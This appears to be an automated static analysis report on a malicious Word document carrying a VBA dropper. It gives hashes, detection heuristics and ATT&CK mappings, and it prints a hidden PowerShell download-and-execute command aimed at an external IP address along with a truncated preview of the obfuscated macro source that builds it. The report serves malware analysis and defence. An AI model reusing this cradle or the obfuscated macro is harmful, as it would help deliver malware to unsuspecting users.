Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1ee03ea88b5a7539…

MALICIOUS

Office (OLE)

Size: 113.8 KB | Created: 2018-06-21 16:06:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-16
MD5: 26db2e9edbf5cfe7a96184af05eeb7a4
SHA-1: 9bdef64948225e353b119bff09767d47c1928e89
SHA-256: 1ee03ea88b5a75399294f60c87f3464d186dd6229938d0d3acdba45e265cc5e9
Risk score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro uses the Shell() function to execute a PowerShell command. The command is assembled at runtime by concatenating character codes to form the string 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://185.143.223.176/a.ps1\')"', which downloads and executes a script from a remote URL. This indicates downloader or dropper functionality.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6589104-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6589104-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16258 bytes
SHA-256: 46c328efa62aa573a6cb1f802a667c6eddead205f13f5b0e8a13a3f5e60d7aef
Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "VzWoimVZKbolW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ElECzWfsNkKwQ"
Function SRvXBvY()
On Error Resume Next
For Each AwmETT In CFduRk
ZWFsqz = (sWtzFH * 51801 + 10129 * CInt(lkLqr - CDbl(29029)) * 15617 * Oct(19591))
MwroXU = OkCraa = TCIct
OLSwh = 84040 + Atn(19286) / 11817 / Round(88071) / 72392 / CInt(OvziB)
Next
EwoCI = "OwerSHell  -j" + "oIn ( " + "[CHar[]](40," + " 89, 77 , 73," + "92 ,103,9" + "9,44,49 ,44, " + "98 ,105" + ", 123,"
For Each DwYRr In YNwKQ
ninPCj = (juGjK * 48097 + 39638 * CInt(rdfdpS - CDbl(914)) * 8565 * Oct(57194))
pWoti = jtOGCX = sQdUHw
NsWZj = 70851 + Atn(33395) / 64427 / Round(52576) / 49134 / CInt(iJuMKM)
Next
wpliQfv = "33 ,99 ,110" + ", 102 ,105,11" + "1, 12" + "0, 44,126,"
For Each MWzRKO In UimNMz
HLGzzP = (wTzRo * 35957 + 46789 * CInt(EjFQi - CDbl(90608)) * 50743 * Oct(35800))
iIdMGi = PcuWz = PKzZOD
zVvXG = 48994 + Atn(12400) / 13999 / Round(91825) / 27978 / CInt(htKOrl)
Next
VAufsC = " 10" + "9,98,104, 99, " + "97," + " 55 , 40 ,70 , " + "118 , " + "124 , 93 ,104, " + "44,49 , 44 ," + " 98,105,123, 3"
For Each rofCM In BQQQv
JhXSw = (MFFhY * 25114 + 37403 * CInt(vpEdA - CDbl(35903)) * 23035 * Oct(46087))
OVzJX = pIpLd = RKaOC
jvJQRj = 97595 + Atn(55232) / 23447 / Round(23086) / 76131 / CInt(cGlKI)
Next
QZPjdpBTwpi = "3 , 99 , 11" + "0,102,1" + "05,11" + "1 " + ",120"
For Each zDojQY In BqIifd
wnfcM = (DNKuJd * 40635 + 48578 * CInt(WTGBdP - CDbl(98730)) * 81716 * Oct(93500))
lhQtpz = iYSpaI = KulsuZ
DJSTpX = 57961 + Atn(1854) / 99744 / Round(97834) / 93649 / CInt(zbQmUU)
Next
aufjmfrF = ",44,9" + "5 , 117 ," + " 127, 12" + "0,105,97 , 34" + " ,66 ,105,120,3" + "4, 91 ,105, 1" + "10,7" + "9 ,96 , 1" + "01 , 105 ,98 ,1"
For Each cvwHtv In JqidG
WshYwZ = (aChYT * 86418 + 84225 * CInt(VuIQX - CDbl(95761)) * 94268 * Oct(82222))
CYXfO = SWsAMF = rnvUWa
XnAEz = 77348 + Atn(91293) / 50800 / Round(24946) / 67463 / CInt(ZBaWZB)
Next
LULYGm = "20" + ",55 ,40 ," + "12" + "6,77 ,98" + ", 121, 102 , "
SRvXBvY = EwoCI + wpliQfv + VAufsC + QZPjdpBTwpi + aufjmfrF + LULYGm
End Function
Function DIbujJIpPMw()
On Error Resume Next
For Each LOOCb In fFbDUV
bWcjO = (TjZss * 17906 + 17203 * CInt(mDTVO - CDbl(87276)) * 99779 * Oct(20700))
zVMIY = MsGrfX = ZrIAi
lWWtSp = 85993 + Atn(2920) / 16259 / Round(66123) / 10618 / CInt(DQLcOB)
Next
dUlMWWaFKO = "125 , 44" + ",49, 44" + " ," + "43 ,1" + "00, 12"
For Each ulNAl In dfjib
NLLYo = (buSfsE * 18607 + 1507 * CInt(cGrzc - CDbl(13325)) * 69806 * Oct(75697))
YWkbp = IXjVr = srWwm
wPtJq = 71050 + Atn(3887) / 871 / Round(47362) / 85408 / CInt(zFdXIA)
Next
UpusDll = "0 ,120 ,124,54," + "35 , 35,1" + "23 ,123,123" + " , 34, 111 , 9" + "6 , 109" + ",121" + ",104,101,99 ," + "105"
For Each sAFHX In XoJwk
UwqAl = (JPfzZ * 78332 + 73034 * CInt(qhPOt - CDbl(68508)) * 83343 * Oct(8045))
mBqrY = CbDPJX = IFrzzk
saQVGi = 80898 + Atn(46738) / 90081 / Round(10778) / 1688 / CInt(QsDwv)
Next
LVYwPiIQR = ", " + "127 ,1" + "24," + " 101 , " + "98" + " , 99 , 96,1" + "09,34 ,111"
For Each lddYWY In sIYKWt
GRNLkV = (tvihzP * 72621 + 13638 * CInt(FGwTOG - CDbl(18553)) * 39388 * Oct(8399))
tNWROY = QRzis = ausiw
YJqlST = 6360 + Atn(50903) / 51456 / Round(43131) / 99197 / CInt(tHsbX)
Next
qntPVcCQjz = ",99 , " + "97,35 " + ",97 ,110 ,88 ," + "53 , 74 ," + "35 , 76 , 10" + "0, 120 ,120, 12" + "4," + " 5" + "4 , "
For Each iQIlw In HLNsW
VYKdf = (CcEzKz * 71251 + 88482 * CInt(rlkVw - CDbl(44701)) * 41792 * Oct(8127))
imLWdH = KECAa = PbKZvR
FLAECQ = 49650 + Atn(54713) / 44426 / Round(45895) / 1709 / CInt(UbvsX)
Next
ZSErckM = "35 ,35 ,123, 1" + "23 , 123," + " 34,100, 105 , " + "97 ,99,124,96 " + ", 10" + "9, 12" + "7,120, 3" + "4 , 126,121" + " , 3"
For Each wzrAti In quVIKY
EXdWmG = (Nhinj * 3356 + 374 * CInt(VUint - CDbl(95043)) * 38923 * Oct(78964))
RSLMV = TM
... (truncated)